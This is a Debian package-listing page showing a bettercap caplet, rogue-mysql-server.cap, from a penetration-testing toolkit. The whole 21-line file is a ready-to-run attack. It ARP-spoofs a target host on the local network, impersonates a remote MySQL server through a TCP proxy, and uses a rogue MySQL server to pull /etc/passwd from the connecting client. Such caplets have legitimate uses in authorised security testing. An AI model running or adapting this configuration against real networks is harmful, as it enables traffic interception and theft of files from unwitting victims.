File: rogue-mysql-server.cap

package info (click to toggle)
bettercap-caplets 0%2Bgit20240106-2
  • links: PTS, VCS
  • area: main
  • in suites: sid, trixie
  • size: 1,028 kB
  • sloc: javascript: 2,112; sh: 29; makefile: 8; python: 1
file content (21 lines) | stat: -rw-r--r-- 501 bytes parent folder | download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# set the target for arp spoofing
set arp.spoof.targets 192.168.1.236

# bind rogue mysql server to localhost and
# set the file we want to read
set mysql.server.address 127.0.0.1
set mysql.server.port 3306
set mysql.server.infile /etc/passwd
mysql.server on

# set the ip from the mysql server we want to impersonate
set tcp.address 93.184.216.34
set tcp.port 3306

# set the ip from the rogue mysql server
set tcp.tunnel.address 127.0.0.1
set tcp.tunnel.port 3306

# go ^_^
tcp.proxy on
arp.spoof on